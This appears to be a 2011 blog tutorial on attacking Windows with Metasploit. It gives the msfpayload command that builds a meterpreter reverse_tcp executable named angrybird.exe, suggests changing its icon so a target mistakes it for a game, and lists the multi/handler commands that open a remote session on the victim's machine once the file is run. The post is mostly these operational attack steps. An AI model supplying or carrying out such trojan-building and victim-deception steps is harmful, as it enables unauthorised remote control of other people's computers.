Saturday, July 23, 2011

Hacking Windows with Metasploit

We will have a brief tutorial, on metasploit multi/hander exploit using a meterpreter payload of reverse_tcp.
Metasploit is a single most powerful open source tool available today for penetration testers. It can be used for developing and executing exploit code against remote target machine. A very famous and widely used penetration tester’s choice.
Metasploit Framework has 4 interfaces to work with
1.       MSF command line
2.       MSF console
3.       MSF GUI
4.       Armitage (recently included along with the framework)
There was also a web based version, which later became obsolete since it was buggy. Msfconsole is the most widely used and powerful mode of metasploit framework.
Metasploit in Matriux:
My tutorial would include Matriux as the Operating system - which can be found here -
Metasploit framework is found in Matriux Arsenal under Menu > Arsenal > Framework > Metasploit Framework.

Optionally it can be started from the terminal by typing msfconsole or msfgui based on what you prefer.

 This is how typically the Graphical interface looks like

However we would like to proceed with the msfconsole which I suggest is an extensive mode for using metasploit framework.
 we will have a brief article on metasploit multi/hander exploit using a meterpreter payload of reverse_tcp.
Start metasploit framework by typing “msfconsole” in the terminal and also type “msfupdate” to update the framework.

Now to start with multi/handler we have to generate the exe binded with reverse_tcp of meterpreter, that we would share with the target windows machines to exploit them. Open up a new terminal and type “msfpayload windows/meterpreter/reverse_tcp LHOST= x.x.x.x LPORT = 1080 X > /home/matriux/angrybird.exe
where, LHOST => Local HOST IP      LPORT = port to listen 

This will generate an angrybird.exe file in the HOME directory as shown here. This file is to be shared with the target machines that we intend to exploit (you can fool your target by changing the icon of the exe file generated and make it look like an angrybird game file ;))

After sharing the file with the target, we wait for the execution of that file. Meanwhile we start the reverse_tcp handler in our system. After starting msfconsole we start the metasploit process by ”use multi/handler”. And set the payload by typing “set payload windows/meterpreter/reverse_tcp

Now set the options LHOST and LPORT by typing “set LHOST localIP" and “SET LPORT porto to listen”. Set them to match with the exe payload we generated earlier, option you can check the options required by typing “show options

We are now ready to exploit our target machines, (here I set up a windows XP machine ), initiate the exploit listening process by typing “exploit” and wait for the target machine to execute the angrybird.exe  as soon as the victim clicks on the executable file it will initialize the meterpreter session with the reverse tcp.

 BINGO we are done!!! We successfully exploited a Windows XP machine with multi/handler

 And have you noticed? We just showed you a preview of Matriux’s upcoming version ;) Ch33rs!!!

This article was earlier published by me in CHmag in the July 2011 Issue -

No comments:

Post a Comment